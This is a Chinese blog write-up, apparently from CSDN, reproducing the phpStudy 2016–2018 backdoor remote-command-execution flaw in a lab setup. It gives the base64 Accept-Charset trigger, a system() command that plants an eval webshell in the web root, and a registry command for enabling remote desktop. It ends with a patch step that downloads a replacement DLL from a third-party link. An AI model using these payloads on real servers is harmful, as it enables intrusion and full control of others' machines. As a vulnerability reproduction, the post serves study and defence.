phpstudy_2016-2018_rce 漏洞复现及深度利用

最新推荐文章于 2024-04-10 02:36:47 发布
最新推荐文章于 2024-04-10 02:36:47 发布
阅读量4.5k 收藏 1
点赞数
分类专栏: 漏洞复现及利用 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67189356/article/details/124214492
版权
说明内容
漏洞编号phpstudy_2016-2018_rce
漏洞名称RCE(Remote Command|Code Execute)
漏洞评级高危
影响范围phpStudy 2016 phpStudy 2018
漏洞描述攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。

漏洞描述

攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code Execute)

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。 其中2016、2018版本的phpstudy存在被黑客恶意篡改后形成的RCE漏洞。该漏洞可以直接远程执行系统命令。

影响版本

后门代码存在于\ext\php_xmlrpc.dll模块中,至少有2个版本: phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45。 其中: phpStudy2016查看:

  \phpStudy\php\php-5.2.17\ext\php_xmlrpc.dll
\phpStudy\php\php-5.4.45\ext\php_xmlrpc.dll

phpStudy2018查看

\PHPTutorial\PHP\PHP-5.2.17\ext\php_xmlrpc.dll
\PHPTutorial\PHP\PHP-5.4.45\ext\php_xmlrpc.dll

漏洞复现

基础环境

组件版本
OSWindows 7 x64
Web ServerphpStudy 2016(特别版)

漏洞扫描

 win7 可以访问server2016

 启动purb工具拦截服务器与浏览器之间的流量

 

 将抓到的报文重放

 

漏洞触发验证

触发条件

Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
Accept-Encoding: gzip,deflate

 

 

深度利用

第一种方式burp 执行系统命令

phpstudy软件被插入后门,通过php system函数执行系统命令,所以我们也可以通过system()函数写入webshell,

system(' ECHO ^<?php@eval($_POST[cmd]); ?^>>"C:/phpStudy/WWW/demon.php ');

第二种方式 也可以在kali里使用 python脚本 实现远程图形化控制

 

 

 启用账户

 

开启3389端口:reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

kali 启动remmina 远程控制对方

 

 

 

 

 

修复建议

下载:http://downinfo.myhostadmin.net/phpxmlrpc.rar 解压

复制文件

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

覆盖原路径文件即可。

 

王志德发
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpstudy_2016.11.03.zip
03-14
phpstudy_2016.11.03.zip工具类软件,开发php的好帮手!
phpstudy_rce.py
10-11
phpstudy_rce
RCE漏洞:phpstudy漏洞复现
一个努力学习网安的小牛马
10-16 251
phpstudy中存在一种RCE漏洞(Remote Code|Command Execute)由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用, 控制服务器。
log4j2 RCE漏洞复现,2024年最新高级网络安全程序员必会
最新发布
e846815793的博客
04-10 326
下载log4j2镜像:(我们选择vulfocus/log4j2-rce-2021-12-09进行验证)启动log4j2镜像:浏览器登录:点击?????
phpstudy小皮面板RCE漏洞_XSS盲打
G3et的博客
02-07 335
最近爆出的phpstudy小皮面板存在RCE漏洞,通过分析和复现发现是一个存储型xss漏洞导致的RCE,这是一个很简单的1click的RCE,通过系统登录用户名输入出的xss配合系统后台自动添加计划任务来实现RCE
漏洞复现phpStudy 小皮 Windows面板 RCE漏洞
做自己喜欢的事,并将其发挥到极致!
02-09 4789
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE
PhpStudy2016-2018-RCE 漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-14 976
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意的命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
phpstudy 最新 RCE漏洞
王嘟嘟的博客
02-04 1238
突然看到这个漏洞,所以起来复现一下,其实没有什么技巧和经验可言,就是一个xss+csrf的RCE。本文仅供参考,请勿用于非法用途。
phpstudy 小皮web面板 RCE漏洞
Websec
02-23 1367
这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。紧接着该系统的后台有一个计划任务功能,其中可以执行系统命令,所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。可以看到确实触发弹窗了,这是因为整个系统在加载的时候会读取操作日志的内容,因为刚才已经插入了弹窗的xss代码,所以这里执行显示了。只要管理员登录到系统,我们插入的xss代码即可写入计划任务并执行,通过计划任务就可以在服务器上写入文件。访问系统登录面板,页面显示如下。
PhpStudy后门漏洞实战复现
la-大白
10-28 4707
phpstudy后门漏洞
phpStudy_2016-2018_RCE漏洞复现
weixin_44801963的博客
09-24 1444
文章目录前言一、phpStudy_2016-2018_RCE是什么二、漏洞存在的文件位置三、漏洞分析总结 前言 phpstudy漏洞在当时的影响还是蛮大的,所以决定对phpstudy存在的漏洞进行解析复现。 一、phpStudy_2016-2018_RCE是什么 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。 其中20162018版本的phpstudy存在被黑客恶
复现PhpStudy2018漏洞复现&检测和执行POC脚本
qq_45031509的博客
07-17 1705
复现PhpStudy2018漏洞复现&检测和执行POC脚本
phpStudy_2016.11.03后门版.zip
09-29
phpStudy_2016.11.03后门版.zip
phpStudy_install_phpStudy_install
09-20
phpStudy_install
phpStudy_2016.11.03.zip
04-24
mysql服务器高负载的情况下,必须采取一种措施给服务器减轻压力,减少服务器的I/O操作。一般采用的方法是优化sql操作语句,优化服务器的配置参数,从而提高服务器的性能。Mysql使用了几种内存缓存数据的策略来提高...
phpstudy_2016-2018_rce漏洞复现
m0_64583632的博客
11-10 877
phpstudy2016phpstudy2018rce漏洞复现
phpstudy漏洞
qq_17054659的博客
01-11 6044
一直在使用的phpstudy,有以下几个漏洞可能存在着被黑的风险,最好能及时修正。 1.通过修改服务器环境内php.ini文件,将“expose_php = On”修改成“expose_php = Off”然后重启php即可。 2.若无需要可以将一些php的危险函数禁用,打开/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函数名:
phpStudy nginx 解析漏洞复现
LuckySec
08-20 4121
0x01 漏洞简介 自从2019年phpStudy爆出后门事件后,2020年9月再次爆出存在nginx解析漏洞。该漏洞phpStudy默认使用的nginx版本是Nginx1.15.11。nginx在解析文件时,由于错误的配置造成文件以错误的格式执行。 影响版本: phpStudy <= 8.1.0.7 (Windows版) 0x02 漏洞原因 1、由于用户的错误配置导致 nginx 把以 .php 结尾的文件交给 fastcgi 处理,为此可以构造 http://www.xxx.com/test
网站被攻击怎么处理 phpstudy存在后门漏洞
网站安全专家
09-27 3529
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。第一时间保障客户的网站安全,以及服务器的安全稳定运行。关于该漏洞的详...
phpstudy sql_mode=only_full_group_by -advertisement
04-30
phpstudy sql_mode=only_full_group_by -advertisement是指在phpstudy中设置MySQL的sql_mode为only_full_group_by,这个模式可以使MySQL在执行GROUP BY语句时更加严格。 在MySQL执行GROUP BY语句时,会将相同的行分组并统计,但有时在分组的字段中可能有一些非空的空值,这时MySQL在默认情况下会将这些空值也视作相同的值进行分组并统计,这可能会导致统计结果出现错误。 而only_full_group_by模式可以在分组时排除空值,只对真正有值的字段进行分组和统计,这样可以确保统计结果的正确性。 然而,启用only_full_group_by模式会使MySQL对语句执行更多的检查和计算,降低了查询的效率,因此在一些MySQL版本中默认关闭了这个模式。如果需要启用,需要手动设置sql_mode为包含only_full_group_by的值。 至于-advertisement部分,可能是意味着这是一条非广告的信息或公告。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值